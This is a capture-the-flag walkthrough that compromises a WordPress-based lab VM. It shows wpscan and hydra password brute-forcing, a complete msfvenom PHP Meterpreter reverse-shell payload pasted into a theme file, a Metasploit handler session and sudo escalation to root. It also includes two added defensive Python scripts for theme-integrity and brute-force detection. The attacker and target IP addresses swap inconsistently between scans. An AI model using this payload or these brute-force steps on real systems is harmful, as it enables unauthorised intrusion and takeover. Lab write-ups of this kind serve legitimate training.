| [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
| Fixed in: 4.5.12
| References:
| - https://wpvulndb.com/vulnerabilities/8966
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
|
| [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
| Fixed in: 4.5.12
| References:
| - https://wpvulndb.com/vulnerabilities/8967
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
|
| [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
| Fixed in: 4.5.12
| References:
| - https://wpvulndb.com/vulnerabilities/8968
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
|
| [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
| Fixed in: 4.5.12
| References:
| - https://wpvulndb.com/vulnerabilities/8969
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
|
| [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
| Fixed in: 4.5.13
| References:
| - https://wpvulndb.com/vulnerabilities/9006
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
| - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
| - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/ticket/42720
|
| [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
| References:
| - https://wpvulndb.com/vulnerabilities/9021
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
| - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
| - https://github.com/quitten/doser.py
| - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
|
| [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
| Fixed in: 4.5.14
| References:
| - https://wpvulndb.com/vulnerabilities/9053
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
|
| [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
| Fixed in: 4.5.14
| References:
| - https://wpvulndb.com/vulnerabilities/9054
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
|
| [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
| Fixed in: 4.5.14
| References:
| - https://wpvulndb.com/vulnerabilities/9055
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
|
| [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
| Fixed in: 4.5.15
| References:
| - https://wpvulndb.com/vulnerabilities/9100
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
| - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
| - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
| - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
| - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
| - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
|
| [!] Title: WordPress <= 5.0 - Authenticated File Delete
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9169
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9170
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
|
| [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9171
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9172
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9173
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
|
| [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9174
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
| Fixed in: 4.5.16
| References:
| - https://wpvulndb.com/vulnerabilities/9175
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a

[+] WordPress theme in use: twentysixteen
| Location: http://192.168.10.3/backup_wordpress/wp-content/themes/twentysixteen/
| Last Updated: 2019-01-09T00:00:00.000Z
| Readme: http://192.168.10.3/backup_wordpress/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 1.8
| Style URL: http://192.168.10.3/backup_wordpress/wp-content/themes/twentysixteen/style.css?ver=4.5
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.10.3/backup_wordpress/wp-content/themes/twentysixteen/style.css?ver=4.5, Match: 'Version: 1.2'

[+] Enumerating Users
Brute Forcing Author IDs - Time: 00:00:03 <=============================================================================================================> (10 / 10) 100.00% Time: 00:00:03

[i] User(s) Identified:

[+] john
| Detected By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] admin
| Detected By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] Finished: Tue Feb 19 10:43:13 2019
[+] Requests Done: 20
[+] Cached Requests: 34
[+] Data Sent: 4.306 KB
[+] Data Received: 36.182 KB
[+] Memory used: 9.75 MB
[+] Elapsed time: 00:00:08

Earlier today, when I went through the VM for the first time, I was really surprised to see such a long list and yet have nothing I could use to break into the machine, so I decided to run wpscan one more time and try to crack the john account.

root@kali:~# wpscan --url 192.168.10.3/backup_wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames "john"
_______________________________________________________________

WordPress Security Scanner by the WPScan Team
Version 3.4.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.10.4/backup_wordpress/
[+] Started: Sun Feb 10 14:30:12 2019

Interesting Finding(s):

[+] http://192.168.10.4/backup_wordpress/
| Interesting Entries:
| - Server: Apache/2.2.22 (Ubuntu)
| - X-Powered-By: PHP/5.3.10-1ubuntu3.26
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.10.4/backup_wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.10.4/backup_wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] WordPress version 4.5 identified (Insecure, released on 2016-04-12).
| Detected By: Rss Generator (Passive Detection)
| - http://192.168.10.4/backup_wordpress/?feed=rss2, <generator>https://wordpress.org/?v=4.5</generator>
| - http://192.168.10.4/backup_wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.5</generator>
|
| [!] 51 vulnerabilities identified (the same list as in the first scan above, omitted here)

[+] WordPress theme in use: twentysixteen
| Location: http://192.168.10.4/backup_wordpress/wp-content/themes/twentysixteen/
| Last Updated: 2019-01-09T00:00:00.000Z
| Readme: http://192.168.10.4/backup_wordpress/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 1.8
| Style URL: http://192.168.10.4/backup_wordpress/wp-content/themes/twentysixteen/style.css?ver=4.5
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.10.4/backup_wordpress/wp-content/themes/twentysixteen/style.css?ver=4.5, Match: 'Version: 1.2'

[+] Enumerating All Plugins

[i] No plugins Found.

[+] Enumerating Config Backups
Checking Config Backups - Time: 00:00:00 <==============================================================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
Error: Request timed out.
Error: Request timed out.
Error: Request timed out.
Error: Request timed out.
Error: Request timed out.
[SUCCESS] - john / enigma
Trying john / paulo Time: 00:20:55 <=================================================================================================================> (2515 / 2515) 100.00% Time: 00:20:55

[i] Valid Combinations Found:
| Username: john, Password: enigma

[+] Finished: Sun Feb 10 14:52:16 2019
[+] Requests Done: 2567
[+] Cached Requests: 4
[+] Data Sent: 1.181 MB
[+] Data Received: 1.765 MB
[+] Memory used: 956.066 MB
[+] Elapsed time: 00:22:04

Incredibly, after about 20 minutes wpscan found a valid combination. That's awesome! Using the password enigma, we can log into WordPress as john.

From here, it doesn't take much to get a reverse shell. We just need to inject a PHP reverse-shell payload into one of the WordPress theme files and we should be good to go.

So, let's generate a PHP Meterpreter payload with msfvenom:

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.10.4 lport=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1113 bytes
/*<?php /**/ error_reporting(0); $ip = '192.168.10.4'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

Then go to Appearance -> Editor in the WordPress admin panel, open one of the theme's PHP files (for example 404.php), and paste the Meterpreter PHP payload into it.

At this point, we can save the file and start a multi/handler on our Kali machine.

root@kali:~# msfconsole
[-] *** Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file
[-] ***




=[ metasploit v5.0.3-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.10.4
LHOST => 192.168.10.4
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.10.4:4444 

Once the multi/handler is listening, we simply request http://192.168.10.3/backup_wordpress/wp-content/themes/twentysixteen/404.php and we should get a shell back.

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.10.4:4444
[*] Sending stage (38247 bytes) to 192.168.10.3
[*] Meterpreter session 1 opened (192.168.10.4:4444 -> 192.168.10.3:41075) at 2019-02-19 13:07:38 -0800

meterpreter > sysinfo
Computer : bsides2018
OS : Linux bsides2018 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686
Meterpreter : php/linux

Boom, we are in the machine! At this point, for some reason I couldn't get any further, so I decided to turn my attention to SSH since the clock was ticking. Now, quick side note: in Part 2 of this video I will show you the steps I took to get root from here, so if you are interested in that, make sure to subscribe and stay tuned. 🙂
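Before moving on to SSH, here is the defender's view of the theme-editor step above, as an added example (my own code, not from the write-up or from WordPress): it builds a SHA-256 manifest of wp-content/themes, diffs it after the edit, scans PHP templates for the socket and eval primitives the stager relies on, and checks whether wp-config.php sets DISALLOW_FILE_EDIT, the WordPress constant that removes the Appearance -> Editor feature entirely. The directory layout, file contents and the inert marker appended to 404.php are constructed for the demo.

```python
#!/usr/bin/env python3
"""Spot theme files altered through the WordPress theme editor.

Added example, not code from the write-up or from WordPress. The directory
layout, file contents and the marker appended to 404.php are constructed.
"""
import hashlib
import os
import re
import tempfile

# Primitives the php/meterpreter/reverse_tcp stager depends on. The stager
# calls some of them through a variable ($f = 'stream_socket_client'), so the
# pattern matches the bare name, not only a direct call. Heuristic only.
SUSPICIOUS = re.compile(
    r"\b(stream_socket_client|fsockopen|socket_create|socket_connect|"
    r"create_function|eval)\b"
)
DISALLOW_RE = re.compile(
    r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.IGNORECASE
)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(themes_dir):
    """Map each file's path relative to themes_dir to its SHA-256."""
    manifest = {}
    for root, _dirs, files in os.walk(themes_dir):
        for name in files:
            full = os.path.join(root, name)
            manifest[os.path.relpath(full, themes_dir)] = sha256_file(full)
    return manifest


def diff_manifest(baseline, current):
    """Sorted lists of paths that changed, appeared or disappeared."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def is_suspicious_source(text):
    """True if PHP source mentions a socket or eval primitive."""
    return SUSPICIOUS.search(text) is not None


def suspicious_php_files(themes_dir):
    """Relative paths of PHP files under themes_dir that trip the heuristic."""
    hits = []
    for root, _dirs, files in os.walk(themes_dir):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(root, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                if is_suspicious_source(fh.read()):
                    hits.append(os.path.relpath(full, themes_dir))
    return sorted(hits)


def file_edit_disabled(wp_config_text):
    """True if wp-config.php defines DISALLOW_FILE_EDIT as true."""
    return DISALLOW_RE.search(wp_config_text) is not None


def demo():
    """Constructed scenario: clean twentysixteen tree, then 404.php is edited."""
    with tempfile.TemporaryDirectory() as tmp:
        themes_root = os.path.join(tmp, "wp-content", "themes")
        theme = os.path.join(themes_root, "twentysixteen")
        os.makedirs(theme)
        for name in ("404.php", "index.php", "style.css"):
            with open(os.path.join(theme, name), "w") as fh:
                fh.write("<?php get_header(); ?>\n" if name.endswith(".php") else "/* Version: 1.2 */\n")
        baseline = build_manifest(themes_root)
        # The tampering from the write-up: 404.php edited through the theme
        # editor. A constructed, non-functional marker stands in for the payload.
        with open(os.path.join(theme, "404.php"), "a") as fh:
            fh.write("<?php $s = fsockopen('192.168.10.4', 4444); /* constructed marker */ ?>\n")
        report = diff_manifest(baseline, build_manifest(themes_root))
        report["suspicious"] = suspicious_php_files(themes_root)
        # A wp-config.php without the constant leaves the editor enabled.
        report["file_edit_disabled"] = file_edit_disabled("<?php define('DB_NAME', 'wordpress');\n")
        return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In a real deployment the baseline manifest is taken right after install or update and stored off the web host, since an attacker with editor access can also rewrite a manifest kept next to the themes.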

Having said that, SSH is always a tricky service in capture-the-flag challenges. You never know whether it is actually exploitable or just there to make you lose time.

Since we found a list of usernames earlier, the first step is to try logging in with each of them.

root@kali:~/pentest# cat users.txt.bk
abatchy
john
mai
anne
doomguy

root@kali:~/pentest# ssh abatchy@192.168.10.3
abatchy@192.168.10.3: Permission denied (publickey).
root@kali:~/pentest# ssh john@192.168.10.3
john@192.168.10.3: Permission denied (publickey).
root@kali:~/pentest# ssh mai@192.168.10.3
mai@192.168.10.3: Permission denied (publickey).
root@kali:~/pentest# ssh anne@192.168.10.3
anne@192.168.10.3's password:
Permission denied, please try again.
anne@192.168.10.3's password:

root@kali:~/pentest# ssh doomguy@192.168.10.3
doomguy@192.168.10.3: Permission denied (publickey).

Apparently, only one account allows password login: anne's. So, let's see if we get lucky with hydra.

root@kali:~/pentest# hydra -l anne -P /usr/share/wordlists/rockyou.txt -e nsr -t 4 -f ssh://192.168.10.4
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-02-10 16:17:20
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344402 login tries (l:1/p:14344402), ~3586101 tries per task
[DATA] attacking ssh://192.168.10.4:22/
[22][ssh] host: 192.168.10.4 login: anne password: princess
[STATUS] attack finished for 192.168.10.4 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-02-10 16:17:49

Yes! It worked! We now have access to the system as anne as well. And surprise, surprise: anne can get to root through sudo.
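Both password-guessing runs in this write-up, the wpscan attack on xmlrpc.php and the hydra run against SSH, leave dense bursts of near-identical log lines on the target. The following added example (mine, not the author's) parses constructed Apache access-log and sshd auth.log lines into (time, source IP, target) events and raises an alert when one source crosses a threshold within a sliding window; the log lines, the threshold and the window size are assumptions.

```python
#!/usr/bin/env python3
"""Flag password-guessing bursts against xmlrpc.php and sshd.

Added example, not code from the write-up. The Apache and auth.log lines,
the threshold and the window size are constructed assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache common log: ip ident user [ts] "METHOD path proto" status size
APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# sshd in auth.log: "Feb 10 16:17:20 host sshd[123]: Failed password for [invalid user] NAME from IP ..."
SSHD_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for '
    r'(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)'
)


def parse_apache_xmlrpc(lines):
    """Yield (time, ip, 'xmlrpc') for every POST to xmlrpc.php.

    One request per guess matched the run above (2567 requests for 2515
    passwords). wpscan also has an xmlrpc-multicall mode that packs many
    guesses into a single request, so request size is worth watching too.
    """
    for line in lines:
        m = APACHE_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].endswith("/xmlrpc.php"):
            continue
        ts = datetime.strptime(m["ts"].split()[0], "%d/%b/%Y:%H:%M:%S")
        yield ts, m["ip"], "xmlrpc"


def parse_sshd_failures(lines, year=2019):
    """Yield (time, ip, 'ssh:<user>') per failed password; syslog lines carry no year."""
    for line in lines:
        m = SSHD_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["ip"], "ssh:" + m["user"]


def detect_bursts(events, threshold, window_seconds):
    """Sliding window per (ip, target); one alert per key when the window fills up."""
    windows = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, ip, target in sorted(events):
        key = (ip, target)
        q = windows[key]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"ip": ip, "target": target, "attempts": len(q), "at": ts.isoformat()})
    return alerts


def constructed_apache_log():
    """One ordinary visitor, then 25 POSTs to xmlrpc.php in 25 seconds (wpscan-style)."""
    base = datetime(2019, 2, 10, 14, 30, 12)
    lines = ['192.168.10.9 - - [10/Feb/2019:14:29:50 -0800] "GET /backup_wordpress/ HTTP/1.1" 200 5123']
    for i in range(25):
        ts = (base + timedelta(seconds=i)).strftime("%d/%b/%Y:%H:%M:%S")
        lines.append(f'192.168.10.4 - - [{ts} -0800] "POST /backup_wordpress/xmlrpc.php HTTP/1.1" 200 403')
    return lines


def constructed_auth_log():
    """One stray failure for an invalid user, then 12 failures for anne in 24 seconds (hydra-style)."""
    base = datetime(2019, 2, 10, 16, 17, 20)
    lines = ["Feb 10 16:10:00 bsides2018 sshd[1200]: Failed password for invalid user mai from 192.168.10.9 port 40000 ssh2"]
    for i in range(12):
        ts = (base + timedelta(seconds=2 * i)).strftime("%b %d %H:%M:%S")
        lines.append(f"{ts} bsides2018 sshd[1234]: Failed password for anne from 192.168.10.4 port 51234 ssh2")
    return lines


def run_detection(threshold=10, window_seconds=60):
    """Run both parsers over the constructed logs and return alerts in time order."""
    events = list(parse_apache_xmlrpc(constructed_apache_log()))
    events += parse_sshd_failures(constructed_auth_log())
    return detect_bursts(events, threshold, window_seconds)


if __name__ == "__main__":
    for alert in run_detection():
        print(alert)
```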

anne@bsides2018:~$ sudo -l
[sudo] password for anne:
Matching Defaults entries for anne on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User anne may run the following commands on this host:
(ALL : ALL) ALL

What a lovely misconfiguration. With sudo -s, we can escalate to root.

anne@bsides2018:~$ sudo -s
root@bsides2018:~# ls
root@bsides2018:~# ls /root
flag.txt
root@bsides2018:~# cat /root/flag.txt
Congratulations!

If you can read this, that means you were able to obtain root permissions on this VM.
You should be proud!

There are multiple ways to gain access remotely, as well as for privilege escalation.
Did you find them all?

@abatchy17

root@bsides2018:~#

Game over! If you have any question, do not hesitate to write me on Twitter (@GianniGnesa). 😉